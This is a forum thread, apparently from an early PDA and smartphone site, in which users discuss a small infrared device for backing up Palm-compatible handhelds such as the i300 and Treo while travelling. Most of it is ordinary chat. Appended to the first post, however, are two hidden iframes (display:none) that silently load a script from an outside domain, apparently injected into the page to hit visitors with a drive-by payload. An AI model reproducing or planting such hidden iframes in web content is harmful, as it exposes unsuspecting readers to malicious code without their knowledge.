+ Reply to Thread

Backup memory box

Ok, I see all sorts of little "backup" devices for Handspring units, Palm units, etc. Each one is customized to its own specific PDA. We I300 owners (and soon the Treo owners) have no means of backing up to a small memory device. So, for those of us who are on the road - away from our computers - if we experience a hard crash we're cooked. No way to restore the data until returning.

(No, I'm not going to try to do some sort of network sync at 14.4, I have filled 7 of my 8mb already)

So, here's my thought. Why can't someone develop a small little memory "box" that has 8mb or 16mb, and an IR transmitter? In order to "backup" your PDA (Sony, Handspring, Handera, Kyocera, Samsung - it won't matter) you just use the included "backup" application to do an entire data dump via IR. Voila, all your data is backed up!

Now, you're 2 days into a 10 day business trip and your PDA crashes HARD. Total reset and memory loss. To get all of your data back out of the device, you need that "backup" application. The IR "memory box" would have its own application availaible in memory to beam into your PDA. You accept the application, and then launch it to pull the rest of the data in from the memory box. Voila, instant (well, 10-15 minutes maybe) recovery of all data and applications.

Seems to me a device like this shouldn't be too hard to build, and could sell like hotcakes. Think about it -- finally, a PDA accessory you wouldn't have to trash next time you upgraded!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

sounds very attractive!

why dont you get with a designer or SF engineer and develop it and patent it? you would definately get lots of folks to get it, myself included...

im sure once this smartphone market really gets banging, we would likely see more thignds like this come out to light.. as of right now, the smartphone market is very , very small.. not enuff market penetration to get manufacturers to focus on things like this...

It truly is a good idea. Obvously, with the Samsung being so sleek, the design would be key to its success, but I think you're on to something friend. Websites may pop up offering storage as such, but I think consumers would rather "have" it, than rely on an intangible solution which is plagued by system failures.

With the soon to come advent of 3G and much higher speeds, a network sync will be more feasible, making the attractiveness of such a device short lived. I can understand the frustration on the road and the reality of a hard crash (they never seem to happen at the right time. ). As a techogeek, I almost always have my laptop attached to me, only going sans the laptop for day trips for sales calls.

Seems like if a low end palm can sell for about $100, a backup device could be developed for quite a bit less. In reality a low end palm might be just the ticket for a backup device.
    Carl

In reality a low end palm might be just the ticket for a backup device.
    I agree with your reasoning. Not even a Palm would be necessary theoretically. Any palm compatible device such as Psion Revo, or anything that can transmit via IR with Palm should suffice.

>Seems like if a low end palm can sell for about $100, a backup device could be developed for quite a bit less. In reality a low end palm might be just the ticket for a backup device.

Well, if I get a I300, I'll have a Visor available for backup. Is there an application that will beam all 8meg to another 8meg device?

Rick

Administrator

Arrow

In reality a low end palm might be just the ticket for a backup device
    until you try to restore from it and realize it needs to be resetted!!

Why would you want to beam all 8 Megs? Just about anything that could be lossed from your I300 on a cold reset can be replaced by syncing invidual apps with another palm compatible device. Don't know that an app designed specifically to sync all 8 Megs is necessary. Remember that some of that is programming which can't be deleted or beamed.

>>Why would you want to beam all 8 Megs? Just about anything that could be lossed from your I300 on a cold reset can be replaced by syncing invidual apps with another palm compatible device.

Yes, but that would take forever, both to backup up all my apps, data and to restore all.

Right now, I have the 8meg backup springboard for my Visor. I backup onto it once a day even when not on the road. It is very easy to make a snapshot of my Visor and restore if necessary. That's what is missing with the i300, Treo, etc.

Rick

I've got one of these. It's made by Toshiba. It works great. I paid about $900 for mine. It's kind of big but came with a case to carry it in. It can back up 15 Gig of data.

P.S. It also doubles as a laptop computer.
    Let he who is without sin cast the first stone.

OUCH!!!

might be cheaper to just get another I300 and use it as a backup.... can you sync two I300's with eachother?

Brooks